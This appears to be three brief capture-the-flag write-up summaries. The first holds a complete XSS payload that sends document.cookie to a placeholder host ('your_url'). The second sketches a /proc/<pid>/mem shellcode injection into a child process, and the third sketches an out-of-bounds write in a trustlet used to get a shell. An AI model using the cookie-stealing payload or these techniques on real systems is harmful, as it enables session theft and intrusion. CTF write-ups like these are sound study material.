tl;dr

• Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e

tl;dr

• Execute shellcode on parent and write to child’s memory using /proc/<pid of child>/mem
• Overwrite return address of child with execve shellcode and pop shell.

tl;dr

Out of bounds write in trustlet ‘1’, allows us to write random bytes at an address of
our choice. We can write our shellcode to an rwx region with this, without any bruteforce.

Note: During the CTF we used a 1 byte brute-force to get write shellcode in the rwx segment and get shell. It was only afterwards that we realised that no bruteforce was required!